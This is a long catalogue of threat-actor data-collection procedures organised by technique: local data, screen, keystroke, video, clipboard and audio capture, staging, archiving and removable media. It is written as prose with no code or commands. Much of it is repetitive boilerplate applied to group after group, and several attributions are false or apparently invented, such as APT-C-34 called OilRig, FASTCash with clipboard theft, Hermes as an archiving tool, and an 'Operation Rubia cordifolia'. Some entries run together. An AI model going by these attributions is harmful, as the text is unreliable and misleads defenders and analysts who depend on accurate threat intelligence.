Procedures
Data from Local System
Operation Wocao: This sophisticated threat actor uses a combination of custom tools, open-source software, and known exploits to collect data from local systems. They deploy specialized malware through initial phishing campaigns or by exploiting system vulnerabilities. Once inside, the malware gathers data by manipulating system services and deploying keyloggers to capture clipboard information. The collected data is staged locally, using techniques to identify and compile sensitive information. Remote file copy methods are then employed to transfer this data to external servers. This approach allows them to exfiltrate sensitive information directly from compromised local systems, emphasizing their capability in gathering data without raising immediate alarms. Their methods highlight the need for robust defenses to detect unauthorized access to local data.
Turla Group (Snake): Turla, known for cyber-espionage activities, utilizes PowerShell scripts to collect data while avoiding detection. They achieve persistence by creating Windows Management Instrumentation (WMI) event filters and altering PowerShell profile scripts, allowing continuous execution of their scripts. These scripts decrypt and load malware directly into memory, bypassing traditional file-based detection mechanisms. Once active, the malware captures system information, user activities, and other sensitive data. This data is then packaged and encrypted before being transmitted to Turla's command and control servers. By using in-memory execution and avoiding disk writes, Turla effectively gathers and exfiltrates data from local systems with minimal detection risk.
Operation Sheep: Hangzhou Shun Wang Technologies embedded the SWAnalytics SDK into various popular applications to collect data from users. When these applications were opened or the device was rebooted, they requested extensive permissions to access contact lists and other personal information. The collected data, including contacts and QQ login details, was encrypted using double DES encryption. This data was then transmitted to remote servers controlled by the attackers. By integrating their malicious SDK into widely-used apps, they were able to gather large amounts of sensitive data from local systems. The technique emphasizes the danger of third-party software permissions in data collection operations.
Operation Pistacchietto: This campaign targeted Italian entities through deceptive fake Java update pages, tricking users into downloading a malicious batch file. This file escalated privileges and achieved persistence by scheduling tasks through the Windows Task Scheduler. The malware then collected data by downloading additional utilities like Netcat and Wget, which were used to transfer information from local systems. The batch file manipulated system directories and services to maintain its presence, continuously gathering data without detection. The collected data was staged locally before being transferred to the attacker's servers. This method demonstrates how social engineering and system exploitation can effectively collect data from compromised systems.
APT3 (Gothic Panda/UPS Team): This China-based group is known for using spear phishing and browser exploits to deploy malware such as Pirpi and PlugX. Once inside a network, they perform extensive reconnaissance with tools like OSInfo, collecting detailed system and user information. The data is compressed and encrypted using tools like WinRAR, preparing it for exfiltration. APT3 stages the collected data on local systems before moving it to external servers. Their method includes leveraging valid credentials and brute-force attacks to move laterally within networks, gathering data from multiple sources. This highlights their sophisticated approach to collecting and securing data from local systems for transfer.
Antlion APT: This Chinese state-backed group targets financial institutions in Taiwan using the xPack backdoor to execute commands and dump credentials via WMIC commands. They achieve persistence by modifying the registry and employing PowerShell scripts for various data collection tasks. Antlion's malware repeatedly dumps credentials and gathers system information, staging the data locally. They use legitimate tools to transfer the staged data to their command and control servers, ensuring continuous data collection. This approach allows them to exfiltrate substantial amounts of intelligence from local systems over extended periods. Their techniques underline the importance of robust defenses against sophisticated data collection methods.
Screen Capture
APT29 (Cozy Bear): This Russian state-backed group uses sophisticated malware to capture screen activity for espionage purposes. They deploy the "CosmicDuke" malware which includes a screen capture module that activates at scheduled intervals or when specific applications are opened. The malware captures screenshots of the victim’s desktop, focusing on sensitive activities such as document editing or email composition. These screenshots are then encrypted and stored in hidden directories on the local system. APT29 uses customized exfiltration methods to transmit the captured screenshots to their command and control servers, often utilizing secure HTTPS connections to avoid detection. By capturing screens during key activities, they gather valuable intelligence without relying solely on traditional data theft methods. This technique helps them monitor ongoing operations and collect sensitive information in real-time.
Turla (Snake): This sophisticated cyber-espionage group from Russia employs screen capturing as part of their data collection tactics. They use the "Carbon" and "Kazuar" backdoors which have built-in capabilities for taking screenshots of the victim’s desktop. These tools are configured to capture screenshots at regular intervals or when specific user actions are detected, such as opening email clients or accessing sensitive documents. The captured images are compressed and encrypted before being stored locally. Turla then schedules data exfiltration tasks to send the screenshots to their remote servers, often using stealthy network communication protocols to evade detection. This screen capture technique allows them to visually document the victim's activities, providing insights into their operations and sensitive information being handled.
APT10 (Stone Panda): Known for targeting various industries globally, this Chinese state-sponsored group employs screen capture as part of their cyber-espionage activities. They use the "QuasarRAT" malware, which includes a module for capturing screenshots. The malware is configured to take screenshots when certain keywords are detected or specific applications are in use. These screenshots are saved in encrypted formats to prevent easy access by security software. APT10 uses encrypted channels to upload the screenshots to their command and control infrastructure, ensuring that the data transfer remains undetected. This method allows them to capture real-time visual data, supplementing other collected information such as keystrokes and system files. Screen captures help APT10 understand the victim’s workflows and access sensitive documents or communications.
DarkHotel: This cyber-espionage group targets business executives and government officials, using advanced malware for screen capture. They deploy the "Inexsmar" malware which includes screen capture functionalities activated under specific conditions, like opening confidential documents or accessing secure portals. The malware captures periodic screenshots, focusing on areas of the screen where sensitive information is likely to be displayed. These images are stored in encrypted files to avoid detection and are periodically exfiltrated to remote servers. DarkHotel uses secure, often encrypted, communication channels for transferring the captured data, minimizing the risk of interception. The screen capture capability allows them to gather detailed visual information about the victim’s activities, supplementing other forms of collected data for comprehensive espionage operations.
Cobalt Group: A financially motivated cybercrime group that uses screen capture to steal sensitive financial information. They deploy the "CobInt" malware, which includes a screen capture module triggered by specific financial applications or keywords. The malware captures screenshots whenever the victim accesses banking websites or financial management software. These screenshots are then encrypted and stored locally until they can be exfiltrated to the group’s command and control servers. The Cobalt Group uses various techniques, such as encrypted HTTP traffic, to transfer the captured screenshots, ensuring stealth and avoiding detection by network security tools. This method enables them to capture critical financial information, such as account details and transaction confirmations, which can be used for further fraudulent activities.
FIN7 (Carbanak): This notorious cybercrime group uses sophisticated malware to capture screens for financial gain. They utilize the "Carbanak" malware, which includes a screen capture feature that activates when victims interact with point-of-sale (POS) systems or financial databases. The malware captures screenshots of the desktop at intervals or based on specific triggers, such as logging into a bank account. These screenshots are saved in encrypted files on the compromised system. FIN7 then exfiltrates the data through encrypted channels to avoid detection. The screen captures provide detailed visual records of financial transactions and sensitive information entered by the victim, enabling FIN7 to commit theft and fraud by understanding the victim's financial operations.
Input Capture: Keylogging
APT28 (Fancy Bear): A Russian state-sponsored group known for using keylogging as part of their cyber-espionage activities. They deploy the "X-Agent" malware, which includes a keylogging module that records keystrokes from the infected system. This module activates upon specific triggers such as accessing email clients or document editing software, capturing all typed information including usernames, passwords, and sensitive communications. The captured keystrokes are stored in encrypted logs on the local system to avoid detection. APT28 periodically exfiltrates these logs to their command and control servers using encrypted communication channels. This technique allows them to gather comprehensive insights into the victim’s activities, access credentials, and collect confidential information.
Emotet: Originally a banking Trojan, Emotet has evolved into a modular malware used primarily for delivering other payloads, including keyloggers. When deployed, Emotet’s keylogging module records all keystrokes entered on the infected machine, capturing sensitive information such as login credentials and financial data. The captured data is encrypted and stored locally, then periodically uploaded to the attackers' command and control servers. Emotet uses advanced evasion techniques to avoid detection, such as hiding its presence by injecting itself into running processes. This allows the attackers to collect valuable information without alerting the victim. The keylogged data is often used for further attacks, including financial fraud and identity theft.
Cobalt Group: A cybercrime group known for targeting financial institutions and deploying keyloggers to steal sensitive data. They use the "CobInt" malware, which includes a keylogging module that activates when users interact with financial applications. The malware records all keystrokes, capturing information such as account credentials, transaction details, and confidential communications. The captured keystrokes are encrypted and stored locally to avoid detection by security software. Cobalt Group periodically exfiltrates this data to their command and control infrastructure, often using encrypted channels. This method allows them to collect detailed financial information which can be used for fraud and further criminal activities.
APT32 (OceanLotus): A Vietnamese state-sponsored group that uses keylogging as part of their extensive cyber-espionage toolkit. They deploy malware like "KerrDown" and "Ratsnif" which include keylogging capabilities to record keystrokes from infected systems. The keylogger activates upon detecting specific applications or activities, capturing sensitive data such as login credentials and confidential communications. The recorded keystrokes are encrypted and stored in hidden directories on the compromised system. APT32 regularly exfiltrates these logs to their command and control servers using encrypted connections. This technique enables them to gather critical intelligence on targeted organizations, including government entities and private corporations.
FIN7 (Carbanak): A financially motivated cybercrime group that uses keylogging to steal sensitive financial information. They employ the "Carbanak" malware which includes a keylogging module that records keystrokes when victims use point-of-sale (POS) systems or access financial databases. The captured keystrokes include login credentials, payment card details, and other sensitive financial data. This information is encrypted and stored locally before being exfiltrated to FIN7's command and control servers. FIN7 uses sophisticated evasion techniques to avoid detection, ensuring the continuous collection of valuable data. The keylogged information is then used for financial fraud and other malicious activities.
Lazarus Group: A North Korean state-sponsored group known for using keyloggers as part of their cyber-espionage and financial theft campaigns. They deploy malware like "Bankshot" which includes keylogging functionality to capture keystrokes from infected systems. The keylogger activates when specific applications are used, such as email clients and financial software, recording all typed information. The captured keystrokes are encrypted and stored in hidden files on the local system. Lazarus Group periodically exfiltrates these logs to their command and control servers using secure communication methods. This allows them to collect detailed information for espionage and financial gain, including login credentials and sensitive communications.
Data Staged: Local Data Staging
APT1 (Comment Crew): A Chinese state-sponsored group known for its extensive cyber-espionage activities targeting various industries. They deploy malware such as "WEBC2" and "Trojan.Downbot" which collect data from compromised systems and store it in hidden directories on local disks. The malware aggregates sensitive documents, emails, and credentials, compressing them into encrypted archives to avoid detection. The staged data is periodically transferred to temporary local folders, where it awaits exfiltration. APT1 uses scheduled tasks to manage the timing of data transfers, ensuring continuous collection without alerting the victim. This method allows them to efficiently manage and prepare large volumes of data for exfiltration, maintaining a low profile while gathering intelligence.
APT28 (Fancy Bear): This Russian cyber-espionage group stages collected data on local systems before exfiltration. They use malware like "Sofacy" and "X-Agent" to harvest sensitive information such as emails, documents, and login credentials. The collected data is stored in encrypted files within hidden directories on the victim's machine. APT28 uses scripts to regularly move and update the data, ensuring it remains current and comprehensive. These files are then exfiltrated in batches to remote servers controlled by the group. By staging data locally, APT28 can carefully manage and secure the collected information before transmission, reducing the risk of detection during the exfiltration process.
FIN7 (Carbanak): This financially motivated cybercrime group stages stolen data on local systems to facilitate exfiltration. They use malware like "Carbanak" and "GratefulPOS" to collect data from point-of-sale systems and financial applications. The gathered data, including payment card information and transaction records, is stored in encrypted files on the local system. FIN7 schedules the movement of these files to less scrutinized directories to evade detection. They then use secure, encrypted channels to periodically transfer the staged data to their remote servers. This staging process ensures that large volumes of data can be collected and managed efficiently before being sent to the attackers' infrastructure.
Lazarus Group: A North Korean state-sponsored group that stages data on local systems as part of their cyber-espionage and financial theft operations. They deploy malware such as "Bankshot" and "Fallchill" to collect sensitive information from infected networks. The data, including financial records and intellectual property, is aggregated into encrypted archives stored in hidden directories. Lazarus Group uses custom scripts to periodically organize and update these archives, preparing them for exfiltration. The staged data is then exfiltrated in controlled batches to remote servers, often using encrypted communication methods to avoid detection. This method allows them to efficiently handle and secure large amounts of stolen data before exfiltration.
Turla (Snake): This Russian cyber-espionage group stages collected data on local systems using sophisticated malware. They deploy tools like "Carbon" and "Kazuar" to gather sensitive information such as documents, emails, and system configurations. The collected data is stored in encrypted files within hidden directories on the compromised system. Turla uses automated scripts to regularly update and move the data, ensuring it remains comprehensive and current. The staged data is then transferred in encrypted batches to their command and control servers. By staging data locally, Turla can manage and secure the information effectively before exfiltration, reducing the risk of detection during data transfer.
Operation Wocao: This sophisticated threat actor stages collected data on local systems before exfiltration to manage large volumes of information efficiently. They use custom malware to harvest sensitive data such as financial records, intellectual property, and user credentials from compromised systems. The data is encrypted and stored in hidden directories, where it is periodically organized and updated by automated scripts. Operation Wocao uses scheduled tasks to move the data to less scrutinized areas of the file system, preparing it for exfiltration. The staged data is then exfiltrated in encrypted batches to remote servers controlled by the attackers. This method allows them to maintain a low profile while ensuring the secure and efficient transfer of stolen data.
Archive Collected Data: Archive via Utility
APT10 (Stone Panda): A Chinese state-sponsored group known for their extensive cyber-espionage campaigns. APT10 frequently uses tools like WinRAR and 7-Zip to compress collected data into encrypted archive files. Once their malware, such as PlugX or QuasarRAT, collects the targeted information, it is stored in these compressed archives. The encryption helps in bypassing detection mechanisms and preserving the confidentiality of the stolen data. The archives are then staged locally on the victim's machine, often in obscure or system directories. Subsequently, these archives are exfiltrated to remote command and control servers using secure communication channels. This method allows APT10 to efficiently package and protect the data during transmission, minimizing the risk of interception and detection.
FIN7 (Carbanak): A financially motivated cybercrime group that frequently employs data compression utilities to archive stolen data. They use tools like WinRAR to compress and encrypt sensitive financial information, such as payment card details and transaction logs. The malware deployed by FIN7, such as Carbanak, gathers this data from compromised point-of-sale systems and databases. After collection, the data is packaged into encrypted RAR or ZIP files to prevent easy detection by security tools. These archives are then moved to staging directories, where they await exfiltration. FIN7 uses encrypted channels to transfer the archived data to their remote servers, ensuring the information remains secure during transit. This technique allows them to handle large volumes of data efficiently while maintaining its integrity and confidentiality.
Turla (Snake): A Russian state-sponsored group that uses data archiving techniques to manage and exfiltrate collected information. Turla employs utilities like 7-Zip to compress and encrypt stolen data into archive files. Their malware, such as Carbon and Kazuar, collects a wide range of data, including documents, emails, and system configurations. The collected data is stored in encrypted ZIP or 7z files to avoid detection by security systems. These files are then staged in hidden or system directories, ready for exfiltration. Turla schedules the transfer of these archives to remote servers using encrypted communication channels, ensuring the data's security during transmission. This approach allows them to efficiently package and secure large amounts of data, facilitating effective and covert exfiltration.
APT28 (Fancy Bear): A Russian cyber-espionage group known for using data compression utilities to archive stolen information. APT28 uses tools like WinRAR and 7-Zip to create encrypted archives of collected data. Their malware, including Sofacy and X-Agent, gathers sensitive information such as emails, documents, and login credentials from targeted systems. The data is then compressed and encrypted into RAR or ZIP files, which are stored in hidden directories. These archives are periodically exfiltrated to remote command and control servers using secure, encrypted channels. By archiving data in this manner, APT28 ensures that the stolen information is protected and easily transferable, reducing the risk of detection during exfiltration.
Lazarus Group: A North Korean state-sponsored group that uses data archiving to handle and exfiltrate stolen data. Lazarus Group utilizes utilities like WinRAR to compress and encrypt collected information into archive files. Their malware, such as Bankshot and Fallchill, gathers data from infected systems, including financial records and intellectual property. This data is then stored in encrypted RAR files, which are hidden in system directories to avoid detection. Lazarus Group schedules the transfer of these archives to their remote servers using encrypted communication methods. This technique allows them to efficiently manage large volumes of data, ensuring its security and integrity during exfiltration.
Operation Wocao: This sophisticated threat actor group employs data archiving utilities to manage collected information before exfiltration. They use tools like 7-Zip to compress and encrypt data into archive files. The malware deployed by Operation Wocao collects a variety of sensitive information, including financial records, intellectual property, and user credentials. The collected data is compressed into encrypted ZIP or 7z files, which are then stored in obscure or system directories on the victim's machine. These archives are periodically moved to less scrutinized areas and exfiltrated to remote servers using secure channels. By archiving the data in this manner, Operation Wocao ensures efficient packaging and protection of the stolen information, facilitating covert and secure exfiltration.
Automated Collection
APT29 (Cozy Bear): A Russian state-sponsored group known for their sophisticated espionage techniques. APT29 utilizes automated scripts within their malware, such as "Sunburst" and "Teardrop," to gather data from infected systems without human intervention. These scripts are configured to collect specific types of information, such as system configurations, user credentials, and document contents. The data is then encrypted and stored locally or directly exfiltrated to remote servers using secure channels. The automation allows for continuous and comprehensive data collection while minimizing the need for manual oversight. This method enables APT29 to efficiently gather large volumes of data from numerous targets simultaneously, increasing their espionage reach.
Lazarus Group: A North Korean state-sponsored group that uses automated collection techniques as part of their cyber-espionage campaigns. They deploy malware like "FASTCash" and "RATs" which include automated scripts to systematically collect financial data, system information, and user credentials. These scripts execute predefined tasks such as scanning directories, extracting specific files, and logging keystrokes. The collected data is automatically encrypted and sent to Lazarus Group's command and control servers via secure communication channels. Automation ensures that data collection is thorough and continuous, reducing the risk of human error and increasing efficiency. This technique allows Lazarus Group to maintain persistent surveillance and data gathering from targeted networks.
Turla (Snake): This Russian cyber-espionage group employs automated collection methods to streamline their data gathering processes. They use tools like "Carbon" and "Kazuar" which include automated modules designed to harvest emails, documents, and system configurations. These modules are configured to run at scheduled intervals or triggered by specific events, ensuring ongoing data collection. The harvested data is automatically encrypted and either stored locally for later exfiltration or immediately sent to Turla's remote servers. The use of automation allows Turla to gather large amounts of data efficiently while avoiding detection. This approach enhances their ability to conduct prolonged espionage campaigns with minimal manual intervention.
APT10 (Stone Panda): A Chinese state-sponsored group known for their automated data collection techniques in cyber-espionage operations. APT10 deploys malware like "QuasarRAT" and "PlugX" that include scripts for automating the collection of system information, intellectual property, and user credentials. These scripts operate continuously, gathering data based on predefined parameters and storing it in encrypted files. The data is then exfiltrated to APT10's servers using secure channels, often employing techniques to blend in with normal network traffic. Automation ensures that the data collection process is comprehensive and efficient, allowing APT10 to gather significant amounts of information with minimal oversight. This method supports their objectives of industrial espionage and intelligence gathering.
FIN7 (Carbanak): A financially motivated cybercrime group that utilizes automated data collection to enhance their operations. They use malware such as "Carbanak" which includes automated scripts to collect payment card data, transaction logs, and other financial information from compromised systems. These scripts are designed to scan for and extract relevant data continuously, ensuring thorough collection without manual intervention. The collected data is encrypted and stored locally before being exfiltrated to FIN7's command and control servers via secure methods. Automation allows FIN7 to maximize their data collection efforts, increasing the volume and value of the stolen information. This technique also reduces the likelihood of detection by minimizing human involvement.
APT32 (OceanLotus): A Vietnamese state-sponsored group that employs automated data collection in their cyber-espionage activities. They deploy malware like "Ratsnif" and "KerrDown" that include automated scripts for gathering system information, emails, and documents. These scripts run silently in the background, executing predefined tasks such as scanning directories and extracting specific types of files. The data is automatically encrypted and sent to APT32's command and control infrastructure via secure channels. Automation ensures that data collection is continuous and comprehensive, allowing APT32 to maintain persistent surveillance over their targets. This approach enables them to gather large amounts of valuable information with minimal manual oversight, enhancing their espionage capabilities.
Video Capture
APT37 (Reaper): A North Korean state-sponsored group known for using video capture to monitor and gather intelligence from their targets. They deploy malware such as "RevengeRAT" which includes functionalities to record video from the victim's webcam. The malware activates the webcam without user knowledge and records footage, particularly when specific activities or applications are detected. These video files are stored locally in encrypted formats to evade detection. Periodically, the recorded videos are exfiltrated to APT37's command and control servers using secure communication channels. This technique allows them to gather real-time intelligence and monitor sensitive activities, enhancing their surveillance capabilities.
APT28 (Fancy Bear): A Russian state-sponsored cyber-espionage group that incorporates video capture into their data collection methods. They utilize tools like "X-Agent" which can access and record video from the victim’s webcam. The malware activates the webcam and captures video footage, particularly when the user engages in activities of interest such as accessing sensitive documents or communications. The video files are encrypted and stored in hidden directories on the victim’s machine. APT28 then uses secure channels to transfer the recorded videos to their remote servers. This method provides them with valuable visual intelligence and helps in understanding the victim’s environment and actions.
Turla (Snake): This Russian cyber-espionage group uses video capture to gather additional intelligence from their targets. They employ malware like "Carbon" which includes features to activate the victim’s webcam and record video. The malware captures video when certain conditions are met, such as the presence of specific applications or activities. The recorded video is encrypted and stored locally, often in hidden directories to avoid detection. Turla schedules regular exfiltration of these video files to their command and control servers using encrypted communication methods. Video capture allows them to monitor the victim’s physical environment and activities, providing a richer context for their espionage efforts.
Lazarus Group: A North Korean state-sponsored group known for using video capture to enhance their surveillance and intelligence gathering. They deploy malware like "KimJongRAT" which includes the capability to activate the victim’s webcam and record video. The malware records video when triggered by specific user actions or schedules, capturing footage of the victim’s activities and surroundings. These video files are encrypted and stored on the victim’s system to avoid detection by security software. Lazarus Group then exfiltrates the videos to their remote servers using secure communication channels. This technique allows them to gather detailed visual intelligence and monitor high-value targets more effectively.
APT10 (Stone Panda): A Chinese state-sponsored group that uses video capture as part of their comprehensive data collection strategy. They utilize malware like "QuasarRAT" which can remotely activate and record from the victim’s webcam. The malware captures video when specific conditions are detected, such as user login or access to sensitive applications. The video recordings are encrypted and stored in concealed directories on the infected system. APT10 periodically transfers these video files to their command and control infrastructure via secure, encrypted channels. This method helps them obtain real-time visual insights into the victim’s environment and activities, complementing other collected data for a fuller intelligence picture.
DarkHotel: A cyber-espionage group targeting business executives and government officials, known for using video capture to gather intelligence. They employ malware like "Inexsmar" which includes functionality to covertly record video from the victim’s webcam. The malware is triggered by specific actions or schedules, capturing video of the victim’s activities and surroundings. The recorded video files are encrypted and stored locally in hidden directories to prevent detection. DarkHotel then exfiltrates these files to their remote servers using secure methods. Video capture provides them with valuable visual context and helps in monitoring the behavior and interactions of their high-profile targets.
Clipboard Data
APT28 (Fancy Bear): A Russian state-sponsored cyber-espionage group known for targeting government and military organizations. They use malware like "X-Agent" which includes a clipboard monitoring module that captures data copied to the clipboard. This feature activates automatically and records clipboard content such as copied text, images, and documents, particularly focusing on credentials, personal information, and sensitive communications. The collected clipboard data is encrypted and stored locally to avoid detection. APT28 periodically exfiltrates the stored data to their command and control servers via encrypted communication channels. This method allows them to gather sensitive information that users may temporarily store in the clipboard, providing valuable insights and access to restricted data.
Lazarus Group: A North Korean state-sponsored group involved in both cyber-espionage and financial theft. They deploy malware like "FASTCash" which includes clipboard monitoring capabilities. The malware captures any data copied to the clipboard, including financial information, login credentials, and personal details. This clipboard data is encrypted and stored in hidden directories on the victim's system. Lazarus Group schedules regular exfiltration of this data to their remote servers using secure channels. By capturing clipboard data, they can intercept sensitive information that might be used for further exploitation or financial gain.
Turla (Snake): A Russian cyber-espionage group known for its sophisticated data collection techniques. They use malware like "Carbon" and "Kazuar" which include modules to monitor and capture clipboard content. The malware records all data copied to the clipboard, focusing on capturing sensitive information such as passwords, personal identification information, and corporate data. The collected clipboard data is encrypted and stored locally before being exfiltrated to Turla's command and control servers. This technique allows Turla to gather valuable intelligence from the clipboard, which users may use to temporarily store sensitive information during their work activities.
APT32 (OceanLotus): A Vietnamese state-sponsored group that targets government and private sector organizations. They use malware like "KerrDown" which includes clipboard monitoring features. The malware captures clipboard data, including text, images, and documents, whenever users copy information. This data is encrypted and stored in concealed directories on the victim's machine. APT32 periodically exfiltrates the clipboard data to their command and control infrastructure using secure communication methods. By monitoring clipboard activity, APT32 can capture transient, sensitive information that may not be stored permanently on the system, enhancing their data collection efforts.
FIN7 (Carbanak): A financially motivated cybercrime group that uses clipboard monitoring to steal sensitive financial information. They employ malware like "Carbanak" which includes a module to capture clipboard content. The malware records data copied to the clipboard, focusing on payment card details, banking information, and financial transaction records. The collected data is encrypted and stored locally before being transmitted to FIN7's command and control servers using secure channels. This method allows FIN7 to intercept and collect valuable financial information that can be used for fraudulent activities and financial gain.
APT10 (Stone Panda): A Chinese state-sponsored group engaged in extensive cyber-espionage activities. They use malware like "QuasarRAT" which includes clipboard monitoring functionalities. The malware captures all data copied to the clipboard, including sensitive corporate information, credentials, and personal data. This clipboard data is encrypted and stored in hidden directories on the compromised system. APT10 schedules regular data exfiltration to transfer the clipboard data to their remote servers using encrypted communication channels. By capturing clipboard data, APT10 can gather a wide range of sensitive information that users might not permanently save on their systems, enhancing their espionage capabilities.
Archive Collected Data: Archive via Custom Method
APT29 (Cozy Bear): A Russian state-sponsored cyber-espionage group known for its sophisticated data collection and archiving methods. APT29 uses custom-developed scripts and tools to collect and compress sensitive data into encrypted archives. Their malware, such as "WellMess" and "WellMail," includes functionalities to search for specific file types and compile them into encrypted archive files. These archives are created using customized encryption algorithms, tailored to bypass conventional detection methods. The archives are then stored in hidden directories on the victim's system or immediately exfiltrated to their command and control servers. By employing custom archiving techniques, APT29 ensures that the collected data is secure and obfuscated, reducing the risk of detection during both the collection and exfiltration phases.
Turla (Snake): This Russian cyber-espionage group uses custom methods to archive collected data, ensuring secure and stealthy exfiltration. Turla’s malware, like "Carbon" and "Kazuar," includes specialized modules for aggregating and compressing collected data into encrypted archive files. They employ unique encryption schemes and compression algorithms to protect the data and evade detection by traditional security tools. These custom archives are stored in hidden or system directories, making them difficult to detect. Turla then exfiltrates the archives using encrypted communication channels, often embedding the data in legitimate traffic to avoid raising alarms. This sophisticated archiving process allows Turla to efficiently manage and secure large volumes of sensitive information.
APT10 (Stone Panda): A Chinese state-sponsored group that utilizes custom archiving methods to manage and secure collected data. APT10 employs tools like "RedLeaves" which include functionalities to gather, compress, and encrypt data using proprietary methods. The collected data is archived into custom encrypted files, often using bespoke encryption keys and algorithms to enhance security. These archives are stored in obscure directories on the victim’s system to evade detection. APT10 schedules regular intervals to transfer these archives to their command and control servers using encrypted channels. Custom archiving ensures that the data is both protected from unauthorized access and obfuscated from security mechanisms, facilitating smooth exfiltration.
FIN7 (Carbanak): This financially motivated cybercrime group uses custom methods to archive stolen data, optimizing it for secure exfiltration. FIN7's malware, such as "GratefulPOS," includes custom scripts to compress and encrypt collected financial data into proprietary archive formats. These archives are created using unique compression and encryption techniques designed to avoid detection by security systems. The archives are stored in system directories or other inconspicuous locations within the victim's network. FIN7 then uses encrypted communication channels to transfer the data to their remote servers. This custom approach allows them to efficiently manage large volumes of sensitive financial information while maintaining a low profile.
Lazarus Group: A North Korean state-sponsored group known for using custom archiving methods to handle collected data. Lazarus Group’s malware, including "Hermes" and "RATs," features modules to collect, compress, and encrypt data using tailored algorithms. These archives are created with proprietary encryption schemes, enhancing data security and obfuscation. The archived data is stored in hidden directories, ensuring it remains undetected by standard security tools. Lazarus Group schedules the transfer of these archives to their command and control servers through encrypted channels. The use of custom methods ensures that the data is protected during collection and exfiltration, supporting their espionage and financial theft operations.
DarkHotel: A cyber-espionage group targeting business executives and government officials, using custom archiving methods for data collection. Their malware, such as "Inexsmar," includes functionalities to collect and compress data into encrypted archives using proprietary techniques. These custom archives are created with specialized encryption keys and algorithms, ensuring the data is secure and obfuscated. The archives are stored in concealed directories on the victim’s system to evade detection. DarkHotel uses secure, often encrypted, communication channels to transfer the archived data to their remote servers. This method allows them to efficiently manage and protect collected information, facilitating stealthy and secure data exfiltration.
Audio Capture
Nazar: Nazar is a lesser-known malware associated with the Equation Group, primarily known for using open-source tools. The malware records audio through the LAME MP3 encoding library by loading the
lame_enc.dllfile, which captures audio from the infected system's microphone. This file is part of a modular suite where different functionalities, including audio recording, are executed based on commands received from the attackers. Communication is managed using a packet sniffer to handle UDP packets, enabling the malware to listen for instructions to start audio recording. Once activated, it captures and sends audio data back to the command and control (C2) server. The recording capabilities are controlled remotely, ensuring that the attackers can initiate and terminate recording sessions as needed. This modular and flexible approach allows Nazar to adapt its functionality according to the operational needs of the attackers.EvilGnome: EvilGnome targets Linux desktop users, a rarity among malware, and records audio using the
ShooterSoundmodule. This module utilizes PulseAudio to capture audio from the user’s microphone. The captured audio is then uploaded to the C2 server. The deployment involves a self-extracting archive (SFX) which installs the spyware executable in a directory mimicking a Gnome shell extension. Persistence is maintained through a script registered to run every minute via the system's crontab scheduler. Each module of EvilGnome operates in its own thread, ensuring continuous operation and data capture. The use of encryption (RC5) for communication with the C2 server ensures that the data exfiltrated remains secure and undetected.Attor: Attor is a sophisticated espionage platform known for its advanced modular design, including an audio capture plugin. This plugin records audio using GSM fingerprinting techniques, targeting connected devices like phones. Attor uses AT commands to interact with GSM devices, allowing it to capture audio and other information. The recorded audio data is encrypted and staged for exfiltration to the C2 server via FTP. Attor’s modularity allows for the audio capture functionality to be dynamically loaded and activated based on specific commands received from the attackers, enhancing its stealth and operational flexibility. The use of the Tor network for C2 communication further anonymizes and secures the data exfiltration process.
TajMahal: TajMahal is an extensive and highly sophisticated APT framework used for cyber espionage. One of its many plugins is designed to record audio from the victim’s microphone. The malware suite is modular, with the audio recording module capturing voice inputs and other sound data, which are then exfiltrated to the C2 server. This framework is capable of reinstallation and injection into running processes, ensuring persistent and covert surveillance. The audio capture capability is part of a broader espionage toolkit that also includes screen capture, keylogging, and file indexing, making TajMahal a versatile and powerful tool for intelligence gathering.
LightNeuron: LightNeuron is a sophisticated tool used by the Turla group, embedded in Microsoft Exchange servers to execute various espionage tasks, including audio capture. The malware uses email-based C2 communication, embedding commands in image files attached to emails. LightNeuron can be configured to record audio from the infected system and exfiltrate this data through the same email-based channels, utilizing steganography to hide the commands and data within seemingly benign email attachments. This method allows LightNeuron to operate undetected by traditional network security tools, making its audio capture capability both covert and effective.
FinSpy: FinSpy is a commercial spyware used for targeted surveillance, capable of recording audio on various platforms including Windows, MacOS, Linux, and Android. The spyware employs a modular architecture, with specific plugins dedicated to capturing audio from the device's microphone. These audio recordings are encrypted and transmitted to the C2 server. FinSpy's distribution methods include phishing and malicious document attachments, ensuring wide reach and effective infection. The spyware's ability to obfuscate its operations using techniques like LLVM-obfuscator and encrypted payloads makes its audio capture capabilities particularly stealthy and difficult to detect.
Data from Removable Media
Machete: Machete is a cyber espionage group primarily targeting military organizations in Latin America, particularly the Venezuelan military. Their malware automatically copies files from newly inserted removable drives to the infected system. This technique involves the malware scanning for connected USB drives and copying all files to a designated folder on the victim’s computer. These files are then encrypted and prepared for exfiltration. The group uses both automated and manual methods to collect and sort the data from these drives. This ensures they can gather a wide array of sensitive information from targeted systems without immediate detection. The exfiltrated data includes documents, images, and other file types of interest.
Operation Rubia cordifolia (Poison Ivy APT): Poison Ivy is known for its use of social engineering and sophisticated phishing frameworks to target various sectors. Their campaigns involve inserting malicious code into removable media, which activates when the media is connected to a computer. The malware then automatically collects data from the connected device, including sensitive files and system information. This data is encrypted and sent to the attackers' command and control servers. By leveraging removable media, they can bypass network security measures and directly infect isolated or highly secured systems. This method of data collection allows the attackers to extract valuable information without needing continuous network access.
UNC2596 (Cuba Ransomware): UNC2596 is a ransomware group that also engages in data exfiltration before encrypting victims' files. They deploy malware that scans for connected removable drives and copies valuable data from them. This technique ensures that sensitive information is extracted and stored for potential use or sale before the ransomware encrypts the data on the main system. The malware operates silently in the background, transferring files to a designated staging area before uploading them to the attackers' servers. This dual approach of data theft and ransomware ensures maximum financial gain from their operations.
APT-C-34 (Iranian Espionage Group): APT-C-34, also known as OilRig, targets various sectors, including telecommunications and energy. They utilize custom-developed malware that activates when a removable drive is connected to an infected machine. The malware scans the drive for files matching specific criteria, such as file types or keywords, and then copies these files to a hidden directory on the system. This data is then encrypted and exfiltrated to the attackers' command and control infrastructure. By targeting removable media, APT-C-34 can obtain sensitive data from air-gapped or otherwise isolated systems that are not connected to the internet.
APT41: APT41 is a Chinese cyber espionage group that uses a wide range of malware to gather intelligence. One of their techniques involves deploying malware that activates upon the insertion of a removable drive. This malware automatically copies files from the drive, focusing on documents and other sensitive information. The copied files are stored in an encrypted format on the infected system, ready for exfiltration at a later stage. This method allows APT41 to gather significant amounts of data from compromised networks, especially in environments where internet connectivity is limited or heavily monitored.
